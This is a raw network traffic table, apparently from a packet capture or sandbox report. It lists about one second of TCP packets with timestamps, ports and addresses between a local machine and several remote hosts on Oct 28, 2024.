                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.328140020 CET4434987220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.328182936 CET49872443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.328464031 CET49872443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.328469992 CET4434987220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.328510046 CET49872443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.328809023 CET4434987220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.328891993 CET4434987220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.329056978 CET49872443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.389846087 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.389930010 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.390326023 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.390337944 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.390440941 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.392508984 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.392519951 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.392571926 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.394874096 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.394885063 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.394941092 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.397252083 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.397263050 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.397310019 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.399612904 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.399624109 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.399633884 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.399671078 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.399702072 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.406152010 CET4434987613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.406562090 CET49876443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.406591892 CET4434987613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.406995058 CET49876443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.407000065 CET4434987613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.416122913 CET4434987713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.416764975 CET49877443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.416774035 CET4434987713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.417197943 CET49877443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.417207956 CET4434987713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.424680948 CET49880443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.424715996 CET4434988020.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.424806118 CET49880443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.424937963 CET49880443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.424952030 CET4434988020.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.513232946 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.513315916 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.513638973 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.513649940 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.513710022 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.514961004 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.514971972 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.515023947 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.516268015 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.516812086 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.516890049 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.516901970 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.516940117 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.518589020 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.518599987 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.518642902 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.519956112 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.519967079 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.520005941 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.521648884 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.521711111 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.541122913 CET4434987613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.541896105 CET4434987613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.542001009 CET49876443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.542040110 CET49876443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.542049885 CET4434987613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.542059898 CET49876443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.542063951 CET4434987613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.544482946 CET49881443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.544543028 CET4434988113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.544634104 CET49881443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.544795990 CET49881443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.544832945 CET4434988113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.551985025 CET4434987713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.553894997 CET4434987713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.553945065 CET49877443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.553988934 CET49877443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.553988934 CET49877443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.554003954 CET4434987713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.554011106 CET4434987713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.556001902 CET49882443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.556042910 CET4434988213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.556144953 CET49882443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.556253910 CET49882443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.556268930 CET4434988213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.558562994 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.558655977 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.558665037 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.558681011 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.558722973 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.637386084 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.637469053 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.637607098 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.637629032 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.637658119 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.637690067 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.638761997 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.638777971 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.638834953 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.640373945 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.640422106 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.640428066 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.640436888 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.640484095 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.641971111 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.641987085 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.642040014 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.643538952 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.646230936 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.682023048 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.682110071 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.682241917 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.682281017 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.682322025 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.682337046 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.683506012 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.683545113 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.683557987 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.683600903 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.762145996 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.762279987 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.763432980 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.763468981 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.763490915 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.763520002 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.763569117 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.764554977 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.764585018 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.764607906 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.764619112 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.764668941 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.765923977 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.765959024 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.766014099 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.767328024 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.767366886 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.767376900 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.767416954 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.768372059 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.768407106 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.768436909 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.768477917 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.805361032 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.805433035 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.805650949 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.805685043 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.805711985 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.805867910 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.807061911 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.807115078 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.807490110 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.807586908 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.907196999 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.907310009 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.907639027 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.907674074 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.907788038 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.909064054 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.909126043 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.909579039 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.909612894 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.909640074 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.909688950 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.910677910 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.910713911 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.910804033 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.911770105 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.911806107 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.911870956 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.913151979 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.913186073 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.913218021 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.913341045 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.929063082 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.929157972 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.929280996 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.929315090 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.929373980 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.930234909 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.930300951 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.930728912 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.930901051 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.988281012 CET4434987813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.989450932 CET49878443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.989473104 CET4434987813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.999522924 CET49878443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.999527931 CET4434987813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.009270906 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.009341955 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.009605885 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.009639978 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.009668112 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.009747028 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.010767937 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.010828972 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.011399031 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.011431932 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.011502981 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.012626886 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.012662888 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.012700081 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.012767076 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.014082909 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.014117956 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.014180899 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.015347958 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.015386105 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.015409946 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.015620947 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.047359943 CET4434987913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.047859907 CET49879443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.047874928 CET4434987913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.048398018 CET49879443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.048403025 CET4434987913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.052434921 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.052527905 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.052634954 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.052669048 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.052687883 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.052716970 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.053525925 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.053560972 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.053594112 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.053643942 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.054869890 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.054935932 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.054941893 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.054969072 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.054989100 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.055012941 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.131050110 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.131122112 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.131378889 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.131429911 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.131475925 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.132195950 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.132229090 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.132288933 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.133831978 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.133891106 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.133977890 CET4434987813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.134135962 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.134171963 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.134186983 CET4434987813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.134196997 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.134218931 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.134248972 CET49878443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.134687901 CET49878443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.134687901 CET49878443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.134700060 CET4434987813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:37.134708881 CET4434987813.107.246.60192.168.2.5
